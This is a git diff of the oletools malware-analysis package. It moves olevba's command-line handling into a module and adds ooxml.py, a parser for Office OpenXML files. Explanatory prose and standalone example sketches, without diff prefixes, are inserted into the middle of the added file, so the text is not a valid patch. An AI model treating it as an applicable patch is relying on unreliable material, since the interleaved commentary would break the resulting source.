- # help='export results to a CSV file')
- parser.add_option("-r", action="store_true", dest="recursive",
- help='find files recursively in subdirectories.')
- parser.add_option("-z", "--zip", dest='zip_password', type='str', default=None,
- help='if the file is a zip archive, open all files from it, using the provided password (requires Python 2.6+)')
- parser.add_option("-f", "--zipfname", dest='zip_fname', type='str', default='*',
- help='if the file is a zip archive, file(s) to be opened within the zip. Wildcards * and ? are supported. (default:*)')
- # output mode; could make this even simpler with add_option(type='choice') but that would make
- # cmd line interface incompatible...
- modes = optparse.OptionGroup(parser, title='Output mode (mutually exclusive)')
- modes.add_option("-t", '--triage', action="store_const", dest="output_mode",
- const='triage', default='unspecified',
- help='triage mode, display results as a summary table (default for multiple files)')
- modes.add_option("-d", '--detailed', action="store_const", dest="output_mode",
- const='detailed', default='unspecified',
- help='detailed mode, display full results (default for single file)')
- modes.add_option("-j", '--json', action="store_const", dest="output_mode",
- const='json', default='unspecified',
- help='json mode, detailed in json format (never default)')
- parser.add_option_group(modes)
- parser.add_option("-a", '--analysis', action="store_false", dest="display_code", default=True,
- help='display only analysis results, not the macro source code')
- parser.add_option("-c", '--code', action="store_true", dest="vba_code_only", default=False,
- help='display only VBA source code, do not analyze it')
- parser.add_option("--decode", action="store_true", dest="show_decoded_strings",
- help='display all the obfuscated strings with their decoded content (Hex, Base64, StrReverse, Dridex, VBA).')
- parser.add_option("--attr", action="store_false", dest="hide_attributes", default=True,
- help='display the attribute lines at the beginning of VBA source code')
- parser.add_option("--reveal", action="store_true", dest="show_deobfuscated_code",
- help='display the macro source code after replacing all the obfuscated strings by their decoded content.')
- parser.add_option('-l', '--loglevel', dest="loglevel", action="store", default=DEFAULT_LOG_LEVEL,
- help="logging level debug/info/warning/error/critical (default=%default)")
- parser.add_option('--deobf', dest="deobfuscate", action="store_true", default=False,
- help="Attempt to deobfuscate VBA expressions (slow)")
- parser.add_option('--relaxed', dest="relaxed", action="store_true", default=False,
- help="Do not raise errors if opening of substream fails")
-
- (options, args) = parser.parse_args()
-
- # Print help if no arguments are passed
- if len(args) == 0:
- print(__doc__)
- parser.print_help()
- sys.exit(RETURN_WRONG_ARGS)
-
- # provide info about tool and its version
- if options.output_mode == 'json':
- # prints opening [
- print_json(script_name='olevba', version=__version__,
- url='http://decalage.info/python/oletools',
- type='MetaInformation')
- else:
- print('olevba %s - http://decalage.info/python/oletools' % __version__)
-
- logging.basicConfig(level=LOG_LEVELS[options.loglevel], format='%(levelname)-8s %(message)s')
- # enable logging in the modules:
- log.setLevel(logging.NOTSET)
-
- # Old display with number of items detected:
- # print '%-8s %-7s %-7s %-7s %-7s %-7s' % ('Type', 'Macros', 'AutoEx', 'Susp.', 'IOCs', 'HexStr')
- # print '%-8s %-7s %-7s %-7s %-7s %-7s' % ('-'*8, '-'*7, '-'*7, '-'*7, '-'*7, '-'*7)
-
- # with the option --reveal, make sure --deobf is also enabled:
- if options.show_deobfuscated_code and not options.deobfuscate:
- log.info('set --deobf because --reveal was set')
- options.deobfuscate = True
- if options.output_mode == 'triage' and options.show_deobfuscated_code:
- log.info('ignoring option --reveal in triage output mode')
-
- # Column headers (do not know how many files there will be yet, so if no output_mode
- # was specified, we will print triage for first file --> need these headers)
- if options.output_mode in ('triage', 'unspecified'):
- print('%-12s %-65s' % ('Flags', 'Filename'))
- print('%-12s %-65s' % ('-' * 11, '-' * 65))
-
- previous_container = None
- count = 0
- container = filename = data = None
- vba_parser = None
- return_code = RETURN_OK
- try:
- for container, filename, data in xglob.iter_files(args, recursive=options.recursive,
- zip_password=options.zip_password, zip_fname=options.zip_fname):
- # ignore directory names stored in zip files:
- if container and filename.endswith('/'):
- continue
-
- # handle errors from xglob
- if isinstance(data, Exception):
- if isinstance(data, PathNotFoundException):
- if options.output_mode in ('triage', 'unspecified'):
- print('%-12s %s - File not found' % ('?', filename))
- elif options.output_mode != 'json':
- log.error('Given path %r does not exist!' % filename)
- return_code = RETURN_FILE_NOT_FOUND if return_code == 0 \
- else RETURN_SEVERAL_ERRS
- else:
- if options.output_mode in ('triage', 'unspecified'):
- print('%-12s %s - Failed to read from zip file %s' % ('?', filename, container))
- elif options.output_mode != 'json':
- log.error('Exception opening/reading %r from zip file %r: %s'
- % (filename, container, data))
- return_code = RETURN_XGLOB_ERR if return_code == 0 \
- else RETURN_SEVERAL_ERRS
- if options.output_mode == 'json':
- print_json(file=filename, type='error',
- error=type(data).__name__, message=str(data))
- continue
-
- try:
- # Open the file
- vba_parser = VBA_Parser_CLI(filename, data=data, container=container,
- relaxed=options.relaxed)
-
- if options.output_mode == 'detailed':
- # fully detailed output
- vba_parser.process_file(show_decoded_strings=options.show_decoded_strings,
- display_code=options.display_code,
- hide_attributes=options.hide_attributes, vba_code_only=options.vba_code_only,
- show_deobfuscated_code=options.show_deobfuscated_code,
- deobfuscate=options.deobfuscate)
- elif options.output_mode in ('triage', 'unspecified'):
- # print container name when it changes:
- if container != previous_container:
- if container is not None:
- print('\nFiles in %s:' % container)
- previous_container = container
- # summarized output for triage:
- vba_parser.process_file_triage(show_decoded_strings=options.show_decoded_strings,
- deobfuscate=options.deobfuscate)
- elif options.output_mode == 'json':
- print_json(
- vba_parser.process_file_json(show_decoded_strings=options.show_decoded_strings,
- display_code=options.display_code,
- hide_attributes=options.hide_attributes, vba_code_only=options.vba_code_only,
- show_deobfuscated_code=options.show_deobfuscated_code,
- deobfuscate=options.deobfuscate))
- else: # (should be impossible)
- raise ValueError('unexpected output mode: "{0}"!'.format(options.output_mode))
- count += 1
-
- except (SubstreamOpenError, UnexpectedDataError) as exc:
- if options.output_mode in ('triage', 'unspecified'):
- print('%-12s %s - Error opening substream or uenxpected ' \
- 'content' % ('?', filename))
- elif options.output_mode == 'json':
- print_json(file=filename, type='error',
- error=type(exc).__name__, message=str(exc))
- else:
- log.exception('Error opening substream or unexpected '
- 'content in %s' % filename)
- return_code = RETURN_OPEN_ERROR if return_code == 0 \
- else RETURN_SEVERAL_ERRS
- except FileOpenError as exc:
- if options.output_mode in ('triage', 'unspecified'):
- print('%-12s %s - File format not supported' % ('?', filename))
- elif options.output_mode == 'json':
- print_json(file=filename, type='error',
- error=type(exc).__name__, message=str(exc))
- else:
- log.exception('Failed to open %s -- probably not supported!' % filename)
- return_code = RETURN_OPEN_ERROR if return_code == 0 \
- else RETURN_SEVERAL_ERRS
- except ProcessingError as exc:
- if options.output_mode in ('triage', 'unspecified'):
- print('%-12s %s - %s' % ('!ERROR', filename, exc.orig_exc))
- elif options.output_mode == 'json':
- print_json(file=filename, type='error',
- error=type(exc).__name__,
- message=str(exc.orig_exc))
- else:
- log.exception('Error processing file %s (%s)!'
- % (filename, exc.orig_exc))
- return_code = RETURN_PARSE_ERROR if return_code == 0 \
- else RETURN_SEVERAL_ERRS
- finally:
- if vba_parser is not None:
- vba_parser.close()
-
- if options.output_mode == 'triage':
- print('\n(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, TXT=Text, M=Macros, ' \
- 'A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, ' \
- 'B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)\n')
-
- if count == 1 and options.output_mode == 'unspecified':
- # if options -t, -d and -j were not specified and it's a single file, print details:
- vba_parser.process_file(show_decoded_strings=options.show_decoded_strings,
- display_code=options.display_code,
- hide_attributes=options.hide_attributes, vba_code_only=options.vba_code_only,
- show_deobfuscated_code=options.show_deobfuscated_code,
- deobfuscate=options.deobfuscate)
-
- if options.output_mode == 'json':
- # print last json entry (a last one without a comma) and closing ]
- print_json(type='MetaInformation', return_code=return_code,
- n_processed=count, _json_is_last=True)
-
- except Exception as exc:
- # some unexpected error, maybe some of the types caught in except clauses
- # above were not sufficient. This is very bad, so log complete trace at exception level
- # and do not care about output mode
- log.exception('Unhandled exception in main: %s' % exc, exc_info=True)
- return_code = RETURN_UNEXPECTED # even if there were others before -- this is more important
- # TODO: print msg with URL to report issues (except in JSON mode)
-
- # done. exit
- log.debug('will exit now with code %s' % return_code)
- sys.exit(return_code)
+from oletools.olevba import *
+from oletools.olevba import __doc__, __version__
if __name__ == '__main__':
main()
-# This was coded while listening to "Dust" from I Love You But I've Chosen Darkness
diff --git a/oletools/ooxml.py b/oletools/ooxml.py
new file mode 100644
index 00000000..57fd16fd
--- /dev/null
+++ b/oletools/ooxml.py
@@ -0,0 +1,726 @@
+#!/usr/bin/env python3
+
+""" Common operations for OpenXML files (docx, xlsx, pptx, ...)
+
+This is mostly based on ECMA-376 (5th edition, Part 1)
+http://www.ecma-international.org/publications/standards/Ecma-376.htm
+
+See also: Notes on Microsoft's implementation of ECMA-376: [MS-OE376]
+
+.. codeauthor:: Intra2net AG
+License: BSD, see source code or documentation
+
+ooxml is part of the python-oletools package:
+http://www.decalage.info/python/oletools
+"""
+
+# === LICENSE =================================================================
+
+# ooxml is copyright (c) 2017-2020 Philippe Lagadec (http://www.decalage.info)
+# All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
+#
+# * Redistributions of source code must retain the above copyright notice,
+# this list of conditions and the following disclaimer.
+# * Redistributions in binary form must reproduce the above copyright notice,
+# this list of conditions and the following disclaimer in the documentation
+# and/or other materials provided with the distribution.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+# POSSIBILITY OF SUCH DAMAGE.
+
+# -----------------------------------------------------------------------------
+# CHANGELOG:
+# 2018-12-06 CH: - ensure stdout can handle unicode
+
+__version__ = '0.54.2'
+
+# -- TODO ---------------------------------------------------------------------
+
+# TODO: may have to tell apart single xml types: office2003 looks much different
+# than 2006+ --> DOCTYPE_*_XML2003
+# TODO: check what is duplicate here with oleid, maybe merge some day?
+# TODO: "xml2003" == "flatopc"? (No)
+
+
+# -- IMPORTS ------------------------------------------------------------------
+
+import sys
+from oletools.common.log_helper import log_helper
+from oletools.common.io_encoding import uopen
+from zipfile import ZipFile, BadZipfile, is_zipfile
+from os.path import splitext
+import io
+import re
+
+# import lxml or ElementTree for XML parsing:
+try:
+ # lxml: best performance for XML processing
+ import lxml.etree as ET
+except ImportError:
+ import xml.etree.cElementTree as ET
+
+###############################################################################
+# CONSTANTS
+###############################################################################
+
+
+logger = log_helper.get_or_create_silent_logger('ooxml')
+
+#: subfiles that have to be part of every ooxml file
+FILE_CONTENT_TYPES = '[Content_Types].xml'
+FILE_RELATIONSHIPS = '_rels/.rels'
+
+#: start of content type attributes
+CONTENT_TYPES_EXCEL = (
+ 'application/vnd.openxmlformats-officedocument.spreadsheetml.',
+ 'application/vnd.ms-excel.',
+)
+CONTENT_TYPES_WORD = (
+ 'application/vnd.openxmlformats-officedocument.wordprocessingml.',
+)
+CONTENT_TYPES_PPT = (
+ 'application/vnd.openxmlformats-officedocument.presentationml.',
+)
+
+#: other content types (currently unused)
+CONTENT_TYPES_NEUTRAL = (
+ 'application/xml',
+ 'application/vnd.openxmlformats-package.relationships+xml',
+ 'application/vnd.openxmlformats-package.core-properties+xml',
+ 'application/vnd.openxmlformats-officedocument.theme+xml',
+ 'application/vnd.openxmlformats-officedocument.extended-properties+xml'
+)
+
+#: constants used to determine type of single-xml files
+OFFICE_XML_PROGID_REGEX = r'<\?mso-application progid="(.*)"\?>'
+WORD_XML_PROG_ID = 'Word.Document'
+EXCEL_XML_PROG_ID = 'Excel.Sheet'
+
+#: constants for document type
+DOCTYPE_WORD = 'word'
+DOCTYPE_EXCEL = 'excel'
+DOCTYPE_POWERPOINT = 'powerpoint'
+DOCTYPE_NONE = 'none'
+DOCTYPE_MIXED = 'mixed'
+DOCTYPE_WORD_XML = 'word-xml'
+DOCTYPE_EXCEL_XML = 'excel-xml'
+DOCTYPE_WORD_XML2003 = 'word-xml2003'
+DOCTYPE_EXCEL_XML2003 = 'excel-xml2003'
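The single-file XML formats (Word 2003 XML, Excel XML) announce themselves with an `mso-application` processing instruction near the top of the file, which is what `OFFICE_XML_PROGID_REGEX` above matches against. A standalone sketch of that detection, outside the patch itself (the sample header is made up):

```python
import re

# same pattern as OFFICE_XML_PROGID_REGEX defined in this module
progid_regex = r'<\?mso-application progid="(.*)"\?>'

# typical first lines of a Word 2003 single-xml document
header = ('<?xml version="1.0"?>\n'
          '<?mso-application progid="Word.Document"?>\n'
          '<w:wordDocument>...</w:wordDocument>')

match = re.search(progid_regex, header)
print(match.group(1))  # Word.Document
```

Only the first 1024 bytes need to be scanned, as `is_single_xml()` below does, since the processing instruction sits in the XML prolog.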
+
+
+###############################################################################
+# HELPERS
+###############################################################################
+
+
+def debug_str(elem):
+ """ for debugging: print an element """
+ if elem is None:
+ return u'None'
+ if elem.tag[0] == '{' and elem.tag.count('}') == 1:
+ parts = ['[tag={{...}}{0}'.format(elem.tag[elem.tag.index('}')+1:]), ]
+ else:
+ parts = ['[tag={0}'.format(elem.tag), ]
+ if elem.text:
+ parts.append(u'text="{0}"'.format(elem.text.replace('\n', '\\n')))
+ if elem.tail:
+ parts.append(u'tail="{0}"'.format(elem.tail.replace('\n', '\\n')))
+ for key, value in elem.attrib.items():
+ parts.append(u'{0}="{1}"'.format(key, value))
+ if key == 'ContentType':
+ if value.startswith(CONTENT_TYPES_EXCEL):
+ parts[-1] += u'-->xls'
+ elif value.startswith(CONTENT_TYPES_WORD):
+ parts[-1] += u'-->doc'
+ elif value.startswith(CONTENT_TYPES_PPT):
+ parts[-1] += u'-->ppt'
+ elif value in CONTENT_TYPES_NEUTRAL:
+ parts[-1] += u'-->_'
+ else:
+ parts[-1] += u'!!!'
+
+ text = u', '.join(parts)
+ if len(text) > 150:
+ return text[:147] + u'...]'
+ return text + u']'
+
+
+def isstr(some_var):
+ """ version-independent test for isinstance(some_var, (str, unicode)) """
+ if sys.version_info.major == 2:
+ return isinstance(some_var, basestring) # true for str and unicode
+ return isinstance(some_var, str) # there is no unicode
+
+
+###############################################################################
+# INFO ON FILES
+###############################################################################
+
+
+def get_type(filename):
+ """ return one of the DOCTYPE_* constants or raise error """
+ parser = XmlParser(filename)
+ if parser.is_single_xml():
+ match = None
+ with uopen(filename, 'r') as handle:
+ match = re.search(OFFICE_XML_PROGID_REGEX, handle.read(1024))
+ if not match:
+ return DOCTYPE_NONE
+ prog_id = match.groups()[0]
+ if prog_id == WORD_XML_PROG_ID:
+ return DOCTYPE_WORD_XML
+ if prog_id == EXCEL_XML_PROG_ID:
+ return DOCTYPE_EXCEL_XML
+ return DOCTYPE_NONE
+
+ is_doc = False
+ is_xls = False
+ is_ppt = False
+ try:
+ for _, elem, _ in parser.iter_xml(FILE_CONTENT_TYPES):
+ logger.debug(u' ' + debug_str(elem))
+ try:
+ content_type = elem.attrib['ContentType']
+ except KeyError: # ContentType not an attr
+ continue
+ is_xls |= content_type.startswith(CONTENT_TYPES_EXCEL)
+ is_doc |= content_type.startswith(CONTENT_TYPES_WORD)
+ is_ppt |= content_type.startswith(CONTENT_TYPES_PPT)
+ except BadOOXML as oo_err:
+ if oo_err.more_info.startswith('invalid subfile') and \
+ FILE_CONTENT_TYPES in oo_err.more_info:
+ # no FILE_CONTENT_TYPES in zip, so probably no ms office xml.
+ return DOCTYPE_NONE
+ raise
+
+ if is_doc and not is_xls and not is_ppt:
+ return DOCTYPE_WORD
+ if not is_doc and is_xls and not is_ppt:
+ return DOCTYPE_EXCEL
+ if not is_doc and not is_xls and is_ppt:
+ return DOCTYPE_POWERPOINT
+ if not is_doc and not is_xls and not is_ppt:
+ return DOCTYPE_NONE
+ logger.warning('Encountered contradictory content types')
+ return DOCTYPE_MIXED
+
+
+def is_ooxml(filename):
+ """ Determine whether given file is an ooxml file; tries get_type """
+ try:
+ doctype = get_type(filename)
+ except BadOOXML:
+ return False
+ except IOError: # one of the required files is not present
+ return False
+ if doctype == DOCTYPE_NONE:
+ return False
+ return True
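The `get_type()` logic above boils down to opening the zip, reading `[Content_Types].xml`, and checking each declared content type against the `CONTENT_TYPES_*` prefixes. A minimal stdlib-only sketch of that idea, separate from the patch (the helper name and the fabricated in-memory zip are for illustration only):

```python
import io
import zipfile
import xml.etree.ElementTree as ET

WORD_PREFIX = 'application/vnd.openxmlformats-officedocument.wordprocessingml.'

def guess_is_word(zip_bytes):
    """Return True if [Content_Types].xml declares a WordprocessingML part."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zipper:
        with zipper.open('[Content_Types].xml') as handle:
            for _, elem in ET.iterparse(handle):
                # Override/Default attributes are un-namespaced
                ctype = elem.attrib.get('ContentType', '')
                if ctype.startswith(WORD_PREFIX):
                    return True
    return False

# build a tiny fake docx-like zip for demonstration
buf = io.BytesIO()
with zipfile.ZipFile(buf, 'w') as zipper:
    zipper.writestr(
        '[Content_Types].xml',
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/'
        'content-types"><Override PartName="/word/document.xml" ContentType="'
        'application/vnd.openxmlformats-officedocument.wordprocessingml.'
        'document.main+xml"/></Types>')

print(guess_is_word(buf.getvalue()))  # True
```

The real `get_type()` additionally tracks Excel and PowerPoint prefixes simultaneously so it can flag contradictory content types as `DOCTYPE_MIXED`.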
+
+
+###############################################################################
+# HELPER CLASSES
+###############################################################################
+
+
+class ZipSubFile(object):
+ """ A file-like object like ZipFile.open returns them, with size and seek()
+
+ ZipFile.open() gives file handles that can be read but not seek()ed since
+ the file is being decompressed in the background. This class implements a
+ reset() function (close and re-open stream) and a seek() that uses it.
+ --> can be used as argument to olefile.OleFileIO and olefile.isOleFile()
+
+ Can be used as a context manager::
+
+ with zipfile.ZipFile('file.zip') as zipper:
+ # replacement for: with zipper.open(subfile) as handle:
+ with ZipSubFile(zipper, 'subfile') as handle:
+ print('subfile in file.zip has size {0}, starts with {1}'
+ .format(handle.size, handle.read(20)))
+ handle.reset()
+
+ Attributes always present:
+ container: the containing zip file
+ name: name of file within zip file
+ mode: open-mode, 'r' per default
+ size: size of the stream (constructor arg or taken from ZipFile.getinfo)
+ closed: True if there was an open() but no close() since then
+
+ Attributes only not-None after open() and before close():
+ handle: direct handle to subfile stream, created by ZipFile.open()
+ pos: current position within stream (can deviate from actual position in
+ self.handle if we fake jump to end)
+
+ See also (and maybe could some day merge with):
+ ppt_record_parser.IterStream; also: oleobj.FakeFile
+ """
+ CHUNK_SIZE = 4096
+
+ def __init__(self, container, filename, mode='r', size=None):
+ """ remember all necessary vars but do not open yet """
+ self.container = container
+ self.name = filename
+ if size is None:
+ self.size = container.getinfo(filename).file_size
+ logger.debug('zip stream has size {0}'.format(self.size))
+ else:
+ self.size = size
+ if 'w' in mode.lower():
+ raise ValueError('Can only read, mode "{0}" not allowed'
+ .format(mode))
+ self.mode = mode
+ self.handle = None
+ self.pos = None
+ self.closed = True
+
+ def readable(self):
+ return True
+
+ def writable(self):
+ return False
+
+ def seekable(self):
+ return True
+
+ def open(self):
+ """ open subfile for reading; open mode given to constructor before """
+ if self.handle is not None:
+ raise IOError('re-opening file not supported!')
+ self.handle = self.container.open(self.name, self.mode)
+ self.pos = 0
+ self.closed = False
+ # print('ZipSubFile: opened; size={}'.format(self.size))
+ return self
+
+ def write(self, *args, **kwargs):
+ """ write is not allowed """
+ raise IOError('writing not implemented')
+
+ def read(self, size=-1):
+ """
+ read given number of bytes (or all data) from stream
+
+ returns bytes (i.e. str in python2, bytes in python3)
+ """
+ if self.handle is None:
+ raise IOError('read on closed handle')
+ if self.pos >= self.size:
+ # print('ZipSubFile: read fake at end')
+ return b'' # fake being at the end, even if we are not
+ data = self.handle.read(size)
+ self.pos += len(data)
+ # print('ZipSubFile: read {} bytes, pos now {}'.format(size, self.pos))
+ return data
+
+ def seek(self, pos, offset=io.SEEK_SET):
+ """ re-position point so read() will continue elsewhere """
+ # calc target position from self.pos, pos and offset
+ if offset == io.SEEK_SET:
+ new_pos = pos
+ elif offset == io.SEEK_CUR:
+ new_pos = self.pos + pos
+ elif offset == io.SEEK_END:
+ new_pos = self.size + pos
+ else:
+ raise ValueError("invalid offset {0}, need SEEK_* constant"
+ .format(offset))
+
+ # now get to that position, doing reads and resets as necessary
+ if new_pos < 0:
+ # print('ZipSubFile: Error: seek to {}'.format(new_pos))
+ raise IOError('Seek beyond start of file not allowed')
+ elif new_pos == self.pos:
+ # print('ZipSubFile: nothing to do')
+ pass
+ elif new_pos == 0:
+ # print('ZipSubFile: seek to start')
+ self.reset()
+ elif new_pos < self.pos:
+ # print('ZipSubFile: seek back')
+ self.reset()
+ self._seek_skip(new_pos) # --> read --> update self.pos
+ elif new_pos < self.size:
+ # print('ZipSubFile: seek forward')
+ self._seek_skip(new_pos - self.pos) # --> read --> update self.pos
+ else: # new_pos >= self.size
+ # print('ZipSubFile: seek to end')
+ self.pos = new_pos # fake being at the end; remember pos >= size
+
+ def _seek_skip(self, to_skip):
+ """ helper for seek: skip forward by given amount using read() """
+ # print('ZipSubFile: seek by skipping {} bytes starting at {}'
+ # .format(to_skip, self.pos))
+ n_chunks, leftover = divmod(to_skip, self.CHUNK_SIZE)
+ for _ in range(n_chunks):
+ self.read(self.CHUNK_SIZE) # just read and discard
+ self.read(leftover)
+ # print('ZipSubFile: seek by skipping done, pos now {}'
+ # .format(self.pos))
+
+ def tell(self):
+ """ inform about position of next read """
+ # print('ZipSubFile: tell-ing we are at {}'.format(self.pos))
+ return self.pos
+
+ def reset(self):
+ """ close and re-open """
+ # print('ZipSubFile: resetting')
+ self.close()
+ self.open()
+
+ def close(self):
+ """ close file """
+ # print('ZipSubFile: closing')
+ if self.handle is not None:
+ self.handle.close()
+ self.pos = None
+ self.handle = None
+ self.closed = True
+
+ def __enter__(self):
+ """ start of context manager; opens the file """
+ # print('ZipSubFile: entering context')
+ self.open()
+ return self
+
+ def __exit__(self, *args, **kwargs):
+ """ end of context manager; closes the file """
+ # print('ZipSubFile: exiting context')
+ self.close()
+
+ def __str__(self):
+ """ creates a nice textual representation for this object """
+ if self.handle is None:
+ status = 'closed'
+ elif self.pos == 0:
+ status = 'open, at start'
+ elif self.pos >= self.size:
+ status = 'open, at end'
+ else:
+ status = 'open, at pos {0}'.format(self.pos)
+
+ return '[ZipSubFile {0} (size {1}, mode {2}, {3})]' \
+ .format(self.name, self.size, self.mode, status)
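`ZipSubFile.seek()` works around the fact that zip decompression streams are forward-only: seeking backwards means closing, re-opening, and reading forward again in chunks. The same trick works for any re-openable forward-only stream; a minimal sketch, separate from the patch (class name and the in-memory stream are hypothetical):

```python
import io

class ForwardOnlySeeker:
    """Emulate seek() on a stream that can only be re-opened and read forward."""
    CHUNK_SIZE = 4096

    def __init__(self, open_func):
        self._open = open_func        # callable returning a fresh stream
        self._handle = open_func()
        self.pos = 0

    def read(self, size=-1):
        data = self._handle.read(size)
        self.pos += len(data)
        return data

    def seek(self, pos, whence=io.SEEK_SET):
        target = pos if whence == io.SEEK_SET else self.pos + pos
        if target < self.pos:         # backwards: reset, then skip forward
            self._handle = self._open()
            self.pos = 0
        to_skip = target - self.pos
        while to_skip > 0:            # forward: read and discard in chunks
            skipped = len(self.read(min(to_skip, self.CHUNK_SIZE)))
            if skipped == 0:
                break                 # ran past end of stream
            to_skip -= skipped

seeker = ForwardOnlySeeker(lambda: io.BytesIO(b'0123456789'))
seeker.seek(7)
print(seeker.read(2))   # b'78'
seeker.seek(2)          # backwards seek triggers reset + skip
print(seeker.read(2))   # b'23'
```

This is why `ZipSubFile` is expensive for access patterns with many backwards seeks: each one re-decompresses the subfile from the start.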
+
+
+class BadOOXML(ValueError):
+ """ exception thrown if file is not an office XML file """
+
+ def __init__(self, filename, more_info=None):
+ """ create exception, remember filename and more_info """
+ super(BadOOXML, self).__init__(
+ '{0} is not an Office XML file{1}'
+ .format(filename, ': ' + more_info if more_info else ''))
+ self.filename = filename
+ self.more_info = more_info
+
+
+###############################################################################
+# PARSING
+###############################################################################
+
+
+class XmlParser(object):
+ """ parser for OOXML files
+
+ handles two different types of files: "regular" OOXML files are zip
+ archives that contain xml data and possibly other files in binary format.
+ In Office 2003, Microsoft introduced another xml-based format, which uses
+ a single xml file as data source. The content of these two types also
+ differs. Method :py:meth:`is_single_xml` tells them apart.
+ """
+
+ def __init__(self, filename):
+ self.filename = filename
+ self.did_iter_all = False
+ self.subfiles_no_xml = set()
+ self._is_single_xml = None
+
+ def is_single_xml(self):
+ """ determine whether this is "regular" ooxml or a single xml file
+
+ Raises a BadOOXML if this is neither one nor the other
+ """
+ if self._is_single_xml is not None:
+ return self._is_single_xml
+
+ if is_zipfile(self.filename):
+ self._is_single_xml = False
+ return False
+
+ # find prog id in xml prolog
+ match = None
+ with uopen(self.filename, 'r') as handle:
+ match = re.search(OFFICE_XML_PROGID_REGEX, handle.read(1024))
+ if match:
+ self._is_single_xml = True
+ return True
+ raise BadOOXML(self.filename, 'is not a zip and has no prog_id')
+
+ def iter_files(self, args=None):
+ """
+ Find files in zip or just give single xml file
+
+ yields pairs (subfile-name, file-handle) where file-handle is an open
+ file-like object. (Do not care too much about encoding here, the xml
+ parser reads the encoding from the first lines in the file.)
+ """
+ if self.is_single_xml():
+ if args:
+ raise BadOOXML(self.filename, 'xml has no subfiles')
+ # do not use uopen, xml parser determines encoding on its own
+ with open(self.filename, 'rb') as handle:
+ yield None, handle # the subfile=None is needed in iter_xml
+ self.did_iter_all = True
+ else:
+ zipper = None
+ subfiles = None
+ try:
+ zipper = ZipFile(self.filename)
+ if not args:
+ subfiles = zipper.namelist()
+ elif isstr(args):
+ subfiles = [args, ]
+ else:
+ # make a copy in case original args are modified
+ # Not sure whether this really is needed...
+ subfiles = tuple(arg for arg in args)
+
+ for subfile in subfiles:
+ with zipper.open(subfile, 'r') as handle:
+ yield subfile, handle
+ if not args:
+ self.did_iter_all = True
+ except KeyError as orig_err:
+ # Note: do not change text of this message without adjusting
+ # conditions in except handlers
+ raise BadOOXML(self.filename,
+ 'invalid subfile: ' + str(orig_err))
+ except BadZipfile:
+ raise BadOOXML(self.filename, 'not in zip format')
+ finally:
+ if zipper:
+ zipper.close()
+
+ def iter_xml(self, subfiles=None, need_children=False, tags=None):
+ """ Iterate xml contents of document
+
+ If given subfile name[s] as optional arg[s], will only parse that
+ subfile[s]
+
+ yields 3-tuples (subfilename, element, depth) where depth indicates how
+ deep in the hierarchy the element is located. Containers of element
+ will come *after* the elements they contain (since they are only
+ finished then).
+
+ Subfiles that are not xml (e.g. OLE or image files) are remembered
+ internally and can be retrieved using iter_non_xml().
+
+ The argument need_children is set to False per default. If you need to
+ access an element's children, set it to True. Note, however, that
+ leaving it at False should save a lot of memory. Otherwise, the parser
+ has to keep every single element in memory since the last element
+ returned is the root which has the rest of the document as children.
+ cf. http://www.ibm.com/developerworks/xml/library/x-hiperfparse/
+
+ Argument tags restricts output to tags with names from that list (or
+ equal to that string). Children are preserved for these.
+ """
+ if tags is None:
+ want_tags = []
+ elif isstr(tags):
+ want_tags = [tags, ]
+ logger.debug('looking for tags: {0}'.format(tags))
+ else:
+ want_tags = tags
+ logger.debug('looking for tags: {0}'.format(tags))
+
+ for subfile, handle in self.iter_files(subfiles):
+ events = ('start', 'end')
+ depth = 0
+ inside_tags = []
+ try:
+ for event, elem in ET.iterparse(handle, events):
+ if elem is None:
+ continue
+ if event == 'start':
+ if elem.tag in want_tags:
+ logger.debug('remember start of tag {0} at {1}'
+ .format(elem.tag, depth))
+ inside_tags.append((elem.tag, depth))
+ depth += 1
+ continue
+ assert(event == 'end')
+ depth -= 1
+ assert(depth >= 0)
+
+ is_wanted = elem.tag in want_tags
+ if is_wanted:
+ curr_tag = (elem.tag, depth)
+ try:
+ if inside_tags[-1] == curr_tag:
+ inside_tags.pop()
+ else:
+ logger.error('found end for wanted tag {0} '
+ 'but last start tag {1} does not'
+ ' match'.format(curr_tag,
+ inside_tags[-1]))
+ # try to recover: close all deeper tags
+ while inside_tags and \
+ inside_tags[-1][1] >= depth:
+ logger.debug('recover: pop {0}'
+ .format(inside_tags[-1]))
+ inside_tags.pop()
+ except IndexError: # no inside_tag[-1]
+ logger.error('found end of {0} at depth {1} but '
+ 'no start event'
+ .format(elem.tag, depth))
+ # yield element
+ if is_wanted or not want_tags:
+ yield subfile, elem, depth
+
+ # save memory: clear elem so parser memorizes less
+ if not need_children and not inside_tags:
+ elem.clear()
+ # cannot do this since we might be using py-builtin xml
+ # while elem.getprevious() is not None:
+ # del elem.getparent()[0]
+ except ET.ParseError as err:
+ self.subfiles_no_xml.add(subfile)
+ if subfile is None: # this is no zip subfile but single xml
+ raise BadOOXML(self.filename, 'content is not valid XML')
+ elif subfile.endswith('.xml'):
+ log = logger.warning
+ else:
+ log = logger.debug
+ log(' xml-parsing for {0} failed ({1}). '
+ .format(subfile, err) +
+ 'Run iter_non_xml to investigate.')
+ assert(depth == 0)
+
+ def get_content_types(self):
+ """ retrieve subfile infos from [Content_Types].xml subfile
+
+ returns (files, defaults) where
